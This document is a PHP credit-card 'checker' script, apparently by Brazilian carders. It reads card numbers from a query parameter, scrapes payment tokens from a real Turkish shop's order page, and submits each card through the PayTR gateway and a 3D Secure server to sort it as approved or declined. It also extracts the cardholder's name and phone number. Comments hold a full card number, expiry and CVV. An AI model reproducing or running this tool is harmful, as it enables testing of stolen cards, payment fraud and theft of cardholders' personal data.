<?

php
set_time_limit(0);
date_default_timezone_set("America/Sao_Paulo");
error_reporting(0);

$time = time();
# WARK CODOU ESSA PORRA AQUI
function getStr($string, $start, $end)
{
$str = explode($start, $string);
$str = explode($end, $str[1]);
return $str[0];
}

function multiexplode($delimiters, $string) {

$one = str_replace($delimiters, $delimiters[0], $string);
$two = explode($delimiters[0], $one);
return $two;
}

$lista = $_GET['lista'];
$cc = multiexplode(array("|", ";", ":", "/", "»", "«", ">", "<", " "), $lista)
[0];
$mes = multiexplode(array("|", ";", ":", "/", "»", "«", ">", "<", " "), $lista)
[1];
$ano = multiexplode(array("|", ";", ":", "/", "»", "«", ">", "<", " "), $lista)
[2];
$cvv = multiexplode(array("|", ";", ":", "/", "»", "«", ">", "<", " "), $lista)
[3];
$time = time();

$cc1 = substr($cc, 0,4);

$cc2 = substr($cc, 4,4);
$cc3 = substr($cc, 8,4);
$cc4 = substr($cc, 12,4);
$f = substr("$mes", 2, 2);
$ano1 = substr("$ano", 2, 2);
$bin = substr($cc, 0,6);

$user = "";
$pass = "";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://www.ankaraabisi.org/odeme/order-pay/105601/?
key=wc_order_RCp1EHKMGWPYP');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_PROXY, $user);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $pass);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(

));
#Cart\u00e3o de Cr\u00e9dito:<\/strong>
#4675670015718014|02|2028|615
$dd = curl_exec($ch);
 $iframe = getStr($dd, 'iframe src="https://www.paytr.com/odeme/guvenli/', '"');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://www.paytr.com/odeme/guvenli/'.$iframe.'');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_PROXY, $user);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $pass);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(

));
#Cart\u00e3o de Cr\u00e9dito:<\/strong>
#4675670015718014|02|2028|615
$dd = curl_exec($ch);
$request_exp_date = getStr($dd, 'name="request_exp_date" value="', '"');

$merchant_oid = getStr($dd, 'name="merchant_oid" value="', '"');

$paytr_token = getStr($dd, 'name="paytr_token" value="', '"');
$ptr_url = getStr($dd, 'name="ptr_url" value="', '"');
$request_exp_date = getStr($dd, 'name="request_exp_date" value="', '"');
$user_ip = getStr($dd, 'name="user_ip" value="', '"');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://www.paytr.com/odeme');
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_PROXY, $user);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $pass);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'content-type: application/x-www-form-urlencoded',

));
curl_setopt($ch, CURLOPT_POSTFIELDS, 'mobile_detect=&merchant_id=338018&user_ip='.
$user_ip.'&merchant_oid='.
$merchant_oid.'&email=welende2santos2%40hotmail.com&payment_amount=5000&user_basket
=W1siW1NUSyA9IDI4NTJdIEdlbmVsIEJhXHUwMTFmXHUwMTMxXHUwMTVmIiw1MCwxXV0%3D&no_installm
ent=1&max_installment=12&submerchant_id=&request_exp_date='.
$request_exp_date.'&currency=TL&test_mode=0&user_name=FABIO+SILVA&user_address=Hask
ovo&user_phone=9899821821&merchant_ok_url=https%3A%2F%2Fwww.ankaraabisi.org%2Fodeme
%2Forder-received%2F105601%2F%3Fkey
%3Dwc_order_RCp1EHKMGWPYP&merchant_fail_url=https%3A%2F%2Fwww.ankaraabisi.org
%2Fsepet
%2F&lang=tr&paytr_token='.urlencode($paytr_token).'&debug_on=1&ptr_url=https%3A%2F
%2Fwww.paytr.com%2Fodeme%2Fguvenli%2F'.$iframe.'&ref_url=https%3A%2F
%2Fwww.ankaraabisi.org
%2F&iframe_odeme=1&eft_ref_str=&installment_count=0&cc_owner=vaasa+sa&card_number='
.$cc.'&expiry_month='.$mes.'&expiry_year='.$ano1.'&cvv=322&card_type_pts=');
$dd = curl_exec($ch);
#Cart\u00e3o de Cr\u00e9dito:<\/strong>
#4675670015718014|02|2028|615
$digest = getStr($dd, 'name="digest" value="', '"');
if ($digest == null){
die("<font size='2,8'><span class='badge badge-danger'>#Reprovada
</span> <span class='badge badge-secondary'>".$cc."|".$mes."|".$ano."|".$cvv."
<span class='badge badge-secondary'></span> </span> <span class='badge badge-
secondary'>DIGEST NULL</span> <span class='badge badge-primary'></span> <span
class='badge badge-primary'>@Warkadas</span><br>"); exit();
}
$transientData = getStr($dd, 'name="transientData" value="', '"');
 $txid = getStr($dd, 'name="txid" value="', '"');
$a = urlencode($digest);
$b = urlencode($transientData);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'https://3d.payten.com.tr/mdpaympi/MerchantServer');
curl_setopt($ch, CURLOPT_PROXY, $user);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $pass);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding: gzip, deflate, br',
'Accept-Language: pt-BR,pt;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
'Cache-Control: max-age=0',
'Content-Type: application/x-www-form-urlencoded',
'Host: 3d.payten.com.tr',
'Origin: https://vpos3.isbank.com.tr',
'Referer: https://vpos3.isbank.com.tr/fim/est3Dgate',
'Sec-Fetch-Dest: document',
'Sec-Fetch-Mode: navigate',
'Sec-Fetch-Site: cross-site',
'Upgrade-Insecure-Requests: 1',
'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0',
'sec-ch-ua: "Chromium";v="122", "Not(A:Brand";v="24", "Microsoft
Edge";v="122"',
'sec-ch-ua-mobile: ?0',
'sec-ch-ua-platform: "Windows"'

));
curl_setopt($ch, CURLOPT_POSTFIELDS, "txid=$txid&TDS2_Navigator_language=pt-
BR&TDS2_Navigator_javaEnabled=false&TDS2_Navigator_jsEnabled=true&TDS2_Screen_color
Depth=24&TDS2_Screen_height=1080&TDS2_Screen_width=1920&TDS2_Screen_PixelDepth=&TDS
2_TimezoneOffset=180&digest=$a&transientData=$b");
$dd = curl_exec($ch);
#Cart\u00e3o de Cr\u00e9dito:<\/strong>
#4675670015718014|02|2028|615
$creq = getStr($dd, 'name="creq" value="', '"');
$threeDSSessionData = getStr($dd, 'name="threeDSSessionData" value="', '"');
$red2ACSv2 = getStr($dd, 'name="red2ACSv2" method="POST" action="', '"');

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $red2ACSv2);
curl_setopt($ch, CURLOPT_PROXY, $user);
curl_setopt($ch, CURLOPT_PROXYUSERPWD, $pass);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
));
curl_setopt($ch, CURLOPT_POSTFIELDS,
"creq=$creq&threeDSSessionData=$threeDSSessionData");
$CreqVbv = curl_exec($ch);

if (strpos($CreqVbv, 'Confirmar')){
$nome = getStr($CreqVbv, '<div id="info_message_auth">', ',');
$tel = getStr($CreqVbv, 'receber&#225; no celular', ',');
 $nomewarka = str_replace('<p>','', $nome);

die("<font size='2,8'><span class='badge badge-success'>#Aprovada </span> <span

class='badge badge-secondary'>".$lista." </span> <span class='badge badge-
secondary'>".$bino33." </span> <span class='badge badge-secondary'>$nomewarka
</span> <span class='badge badge-secondary'>$tel</span> <span class='badge badge-
secondary'></span> <span class='badge badge-primary'>@lzdelas157</span><br>");
}else if (strpos($CreqVbv, 'ID Santander.')) {
die("<font size='2,8'><span class='badge badge-success'>#Aprovada </span> <span
class='badge badge-secondary'>".$lista." </span> <span class='badge badge-
secondary'>".$bino33." </span> <span class='badge badge-secondary'>Validação de
Segurança</span> <span class='badge badge-secondary'></span> <span class='badge
badge-primary'>@lzdelas157</span><br>");
}else{
die("<font size='2,8'><span class='badge badge-danger'>#Reprovada </span> <span
class='badge badge-secondary'>".$cc."|".$mes."|".$ano."|".$cvv." <span class='badge
badge-secondary'></span> </span> <span class='badge badge-secondary'>CARTÂO
RECUSADO</span> <span class='badge badge-primary'></span> <span class='badge badge-
primary'>@lzdelas157</span><br>");
}
?>